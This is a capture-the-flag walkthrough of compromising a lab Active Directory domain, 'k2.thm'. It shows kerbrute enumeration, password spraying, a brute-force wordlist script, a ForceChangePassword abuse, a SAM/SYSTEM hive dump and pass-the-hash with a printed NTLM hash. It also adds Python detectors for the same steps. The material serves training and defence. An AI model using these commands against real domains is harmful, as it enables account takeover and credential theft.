🏔️K2 - 2/3 (AD)

Use all of the information gathered from your previous findings in order to keep making your way to the top.

Network Enumeration

nmap

autoscan 10.10.167.138

nmap result

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-08-12 14:41:54Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: k2.thm0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: k2.thm0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=K2Server.k2.thm
| Not valid before: 2025-08-11T14:36:51
|_Not valid after:  2026-02-10T14:36:51
| rdp-ntlm-info: 
|   Target_Name: K2
|   NetBIOS_Domain_Name: K2
|   NetBIOS_Computer_Name: K2SERVER
|   DNS_Domain_Name: k2.thm
|   DNS_Computer_Name: K2Server.k2.thm
|   DNS_Tree_Name: k2.thm
|   Product_Version: 10.0.17763
|_  System_Time: 2025-08-12T14:42:43+00:00
|_ssl-date: 2025-08-12T14:43:23+00:00; +1s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp  open  pando-pub?
9389/tcp  open  mc-nmf        .NET Message Framing
49669/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49682/tcp open  msrpc         Microsoft Windows RPC
49711/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: K2SERVER; OS: Windows; CPE: cpe:/o:microsoft:windows
  • Windows - Active Directory

  • Kerberos, SMB, RPC, LDAP

  • domain: k2.thm

  • computer: K2SERVER

Domain User Enumeration

Username-Anarchy

Generate username variants from the names collected previously
./username-anarchy james bold > users.txt
./username-anarchy rose bud >> users.txt

Kerbrute Userenum

kerbrute userenum --dc 10.10.167.138 -d k2.thm users.txt

[+] VALID USERNAME: [email protected]
[+] VALID USERNAME: [email protected]

Password Spraying

Passwords collected previously

passes.txt
james:Pwd@9tLNrC3!
rose:vRMkaVgdfxhW!8
root:RdzQ7MSKt)fNaz3!
crackmapexec smb 10.10.167.138 -u users.txt -p passes.txt

[+] k2.thm\r.bud:vRMkaVgdfxhW!8

Remote Login

Check permissions
netexec winrm -i 10.10.167.138 -u r.bud -p 'vRMkaVgdfxhW!8'

[+] k2.thm\r.bud:vRMkaVgdfxhW!8 (Pwn3d!)

Establish a remote Windows session
evil-winrm -i 10.10.167.138 -u r.bud -p 'vRMkaVgdfxhW!8'

System Intrusion

Remote Windows session: k2\r.bud

Post-Intrusion Enumeration

C:\Users\r.bud\Documents

  • notes.txt

  • note_to_james.txt

James's new password is 'rockyou' + a number + a special character.

net users

Local users: j.bold, r.bud, j.smith, administrator

pass-gen.py script

#!/usr/bin/env python3
# Builds every candidate of the form base + digit + special character for the
# positions below, following the hint found in note_to_james.txt.
import argparse
import itertools
import string
from pathlib import Path

def parse_args():
    p = argparse.ArgumentParser(description="Genera wordlist con dígito y caracter especial en posiciones flexibles")
    p.add_argument("--base", "-b", default="rockyou", help="Contraseña base (default: rockyou)")
    p.add_argument("--specials", "-s", default=None,
                   help="Cadena con caracteres especiales a usar (por defecto string.punctuation)")
    p.add_argument("--out", "-f", default=None, help="Archivo de salida (si se omite, solo imprime por pantalla)")
    return p.parse_args()

def main():
    args = parse_args()
    base = args.base
    digits = "0123456789"
    specials = args.specials if args.specials is not None else string.punctuation

    combos = []

    # 1. Both suffixes at the end (digit+special and special+digit)
    for d, s in itertools.product(digits, specials):
        combos.append(base + d + s)
    for s, d in itertools.product(specials, digits):
        combos.append(base + s + d)

    # 2. Both prefixes at the beginning (digit+special and special+digit)
    for d, s in itertools.product(digits, specials):
        combos.append(d + s + base)
    for s, d in itertools.product(specials, digits):
        combos.append(s + d + base)

    # 3. Digit at the beginning, special character at the end
    for d, s in itertools.product(digits, specials):
        combos.append(d + base + s)

    # 4. Special character at the beginning, digit at the end
    for s, d in itertools.product(specials, digits):
        combos.append(s + base + d)

    # Remove duplicates while preserving generation order
    seen = set()
    unique = []
    for w in combos:
        if w not in seen:
            seen.add(w)
            unique.append(w)

    # Always print to stdout
    for w in unique:
        print(w)
    print(f"# Total: {len(unique)}")

    # Save to a file only if requested
    if args.out:
        out_path = Path(args.out)
        with out_path.open("w", encoding="utf-8", newline="\n") as fh:
            for w in unique:
                fh.write(w + "\n")
        print(f"[+] Guardado en: {out_path}")

if __name__ == "__main__":
    main()

Generate the passes.txt wordlist

python3 pass-gen.py --out passes.txt

Kerbrute Password Bruteforce

kerbrute bruteuser --dc 10.10.167.138 -d k2.thm passes.txt j.bold

[+] VALID LOGIN: [email protected]:#8rockyou
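From the defender's side, the username enumeration and the dictionary run above leave a distinctive trail on the domain controller: bursts of Event ID 4768 with result code 0x6 (unknown principal) from one source, and repeated Event ID 4771 with result code 0x18 (pre-auth failure) against one account. The following detector is an added example, not part of the writeup; the event dicts are constructed to mimic the real event fields, the source addresses are assumed, and the crackmapexec SMB spray would instead surface as NTLM events (4625/4776) to which the same per-source grouping applies.

```python
from collections import defaultdict

# Kerberos result codes (RFC 4120) that this attack chain produces on the DC.
ERR_PRINCIPAL_UNKNOWN = "0x6"   # 4768: account does not exist -> username enumeration
ERR_PREAUTH_FAILED = "0x18"     # 4771: wrong password -> spraying or brute force


def detect_kerberos_abuse(events, window_s=300, threshold=5):
    """Return (finding, source_ip, detail) tuples for bursts inside window_s seconds."""
    enum_users = defaultdict(set)   # (ip, bucket) -> unknown names tried
    spray_users = defaultdict(set)  # (ip, bucket) -> distinct real accounts that failed
    brute = defaultdict(int)        # (ip, bucket, account) -> failures on one account
    for e in events:
        key = (e["IpAddress"], e["ts"] // window_s)
        user = e["TargetUserName"].lower()
        if e["EventID"] == 4768 and e["Status"] == ERR_PRINCIPAL_UNKNOWN:
            enum_users[key].add(user)
        elif e["EventID"] == 4771 and e["Status"] == ERR_PREAUTH_FAILED:
            spray_users[key].add(user)
            brute[key + (user,)] += 1
    findings = []
    for (ip, _), users in enum_users.items():
        if len(users) >= threshold:
            findings.append(("kerberos_user_enum", ip, len(users)))
    for (ip, _), users in spray_users.items():
        if len(users) >= threshold:
            findings.append(("password_spray", ip, len(users)))
    for (ip, _, user), n in brute.items():
        if n >= threshold:
            findings.append(("password_bruteforce", ip, user))
    return findings


# Constructed sample log (not real telemetry): a username-anarchy style list probed
# from one host, a dictionary run against j.bold, and one honest typo by r.bud.
ATTACKER = "10.10.14.5"   # assumed source address for the example
SAMPLE_EVENTS = (
    [{"EventID": 4768, "Status": ERR_PRINCIPAL_UNKNOWN, "IpAddress": ATTACKER,
      "TargetUserName": u, "ts": 100 + i}
     for i, u in enumerate(["james", "jbold", "james.bold", "bold", "rose", "rbud", "rosebud"])]
    + [{"EventID": 4771, "Status": ERR_PREAUTH_FAILED, "IpAddress": ATTACKER,
        "TargetUserName": "j.bold", "ts": 200 + i} for i in range(12)]
    + [{"EventID": 4771, "Status": ERR_PREAUTH_FAILED, "IpAddress": "10.10.20.7",
        "TargetUserName": "r.bud", "ts": 250}]
)

if __name__ == "__main__":
    for finding in detect_kerberos_abuse(SAMPLE_EVENTS):
        print(finding)
```

The single failure from 10.10.20.7 stays below the threshold, which is what separates a user mistyping a password from the tooling used above.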

Authenticated Domain Enumeration

Collection

bloodhound-python -u r.bud -p 'vRMkaVgdfxhW!8' -d k2.thm -ns 10.10.167.138 -c All --zip

BloodHound info

[email protected] → MemberOf → IT STAFF 1 → GenericAll → [email protected] (Domain Admin)

  • GenericAll includes the ForceChangePassword right

Exploitation: ForceChangePassword

net rpc password "j.smith" "Pass123" -U "K2.THM"/"j.bold"%"#8rockyou" -S "10.10.167.138"
Check the change
netexec winrm K2SERVER.k2.thm -u j.smith -p 'Pass123'

[+] k2.thm\j.smith:Pass123 (Pwn3d!)

evil-winrm -i 10.10.167.138 -u j.smith -p 'Pass123'

Privilege Escalation

Remote Windows session: k2\j.smith

Post-Escalation Enumeration

Check privileges
whoami /priv
SeBackupPrivilege     |    Back up files and directories  |    Enabled
SeRestorePrivilege    |    Restore files and directories  |    Enabled

SAM/SYSTEM Backup + Pass the Hash Attack

Privilege Escalation: SAM/SYSTEM Backup + PtH Attack

Back up SAM + SYSTEM
reg save hklm\system C:\Users\j.smith\temp\system.hive
reg save hklm\sam C:\Users\j.smith\temp\sam.hive
Download directly through evil-winrm
download system.hive
download sam.hive
Extract NTLM hashes
impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Start a remote session with the administrator hash
evil-winrm -i 10.10.167.138 -u administrator -H '9545b61858c043477c350ae86c37b32f'
Dump the administrator's password
netexec smb K2SERVER.k2.thm -u administrator -H '9545b61858c043477c350ae86c37b32f' --dpapi

K2\Administrator:vz0q$i8b4c
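Both of the steps that turned a low-privileged account into Domain Admin here are visible in the Security log: the ForceChangePassword reset via `net rpc password` is logged as Event ID 4724 with the acting user in SubjectUserName and the victim in TargetUserName, and `reg save hklm\sam` / `hklm\system` appears as Event ID 4688 when process command-line auditing is enabled (without it, the 4688 event carries no command line and this rule is blind). This detector is an added example rather than part of the writeup; the event dicts are constructed, and the allow-list of accounts expected to reset passwords is an assumption to be populated from your own directory.

```python
import re

# Accounts that legitimately reset other users' passwords (assumed allow-list
# for the example; in a real deployment derive it from helpdesk/admin groups).
EXPECTED_RESETTERS = {"administrator", "helpdesk-svc"}

# reg save / reg export of the hives that hold local credentials.
HIVE_DUMP = re.compile(r"\breg(\.exe)?\s+(save|export)\s+hklm\\(sam|system|security)\b", re.I)


def detect_post_compromise(events):
    """Return (finding, actor, detail) tuples for the two escalation steps."""
    findings = []
    for e in events:
        if e["EventID"] == 4724:
            actor = e["SubjectUserName"].lower()
            target = e["TargetUserName"].lower()
            # A non-admin resetting somebody else's password is the GenericAll /
            # ForceChangePassword abuse seen in this room.
            if actor != target and actor not in EXPECTED_RESETTERS:
                findings.append(("unexpected_password_reset", actor, target))
        elif e["EventID"] == 4688 and HIVE_DUMP.search(e.get("CommandLine", "")):
            # SeBackupPrivilege lets a plain user copy SAM/SYSTEM; the command line is
            # the only cheap indicator, since the file reads themselves are legitimate.
            findings.append(("credential_hive_dump", e["SubjectUserName"].lower(), e["CommandLine"]))
    return findings


# Constructed sample events (not real telemetry), mirroring the steps above plus two
# benign entries that must not be flagged.
SAMPLE_EVENTS = [
    {"EventID": 4724, "SubjectUserName": "j.bold", "TargetUserName": "j.smith"},
    {"EventID": 4724, "SubjectUserName": "Administrator", "TargetUserName": "r.bud"},
    {"EventID": 4688, "SubjectUserName": "j.smith",
     "CommandLine": r"reg  save hklm\sam C:\Users\j.smith\temp\sam.hive"},
    {"EventID": 4688, "SubjectUserName": "j.smith",
     "CommandLine": r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion"},
]

if __name__ == "__main__":
    for finding in detect_post_compromise(SAMPLE_EVENTS):
        print(finding)
```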

System Compromise

Remote Windows session: k2\administrator
